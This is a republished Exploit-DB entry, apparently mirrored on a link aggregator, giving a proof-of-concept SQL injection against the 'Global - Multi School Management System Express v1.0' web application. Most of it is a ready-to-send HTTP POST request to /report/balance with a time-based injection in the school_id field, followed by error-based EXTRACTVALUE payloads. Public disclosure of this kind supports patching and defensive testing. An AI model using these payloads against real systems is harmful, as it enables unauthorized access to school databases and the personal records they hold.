5
[webapps] Global - Multi School Management System Express v1.0- SQL Injection
source link: https://www.exploit-db.com/exploits/51690
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.
Global - Multi School Management System Express v1.0- SQL Injection
EDB-ID:
51690
EDB Verified:
# Exploit Title: Global - Multi School Management System Express v1.0- SQL Injection
# Date: 2023-08-12
# Exploit Author: Ahmet Ümit BAYRAM
# Vendor: https://codecanyon.net/item/global-multi-school-management-system-express/21975378
# Tested on: Kali Linux & MacOS
# CVE: N/A
### Request ###
POST /report/balance HTTP/1.1
Content-Type: multipart/form-data; boundary=----------YWJkMTQzNDcw
Accept: */*
X-Requested-With: XMLHttpRequest
Referer: http://localhost
Cookie: gmsms=b8d36491f08934ac621b6bc7170eaef18290469f
Content-Length: 472
Accept-Encoding: gzip,deflate,br
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36
Host: localhost
Connection: Keep-alive
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="school_id"
0'XOR(if(now()=sysdate(),sleep(6),0))XOR'Z
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="academic_year_id"
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="group_by"
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="date_from"
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="date_to"
------------YWJkMTQzNDcw--
### Parameter & Payloads ###
Parameter: MULTIPART school_id ((custom) POST)
Type: error-based
Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY
clause (EXTRACTVALUE)
Payload: ------------YWJkMTQzNDcw
Content-Disposition: form-data; name="school_id"
0'XOR(if(now()=sysdate(),sleep(6),0))XOR'Z' AND
EXTRACTVALUE(1586,CONCAT(0x5c,0x71766b6b71,(SELECT
(ELT(1586=1586,1))),0x716a627071)) AND 'Dyjx'='Dyjx
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="academic_year_id"
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="group_by"
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="date_from"
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="date_to"
------------YWJkMTQzNDcw–
Recommend
About Joyk
Aggregate valuable and interesting links.
Joyk means Joy of geeK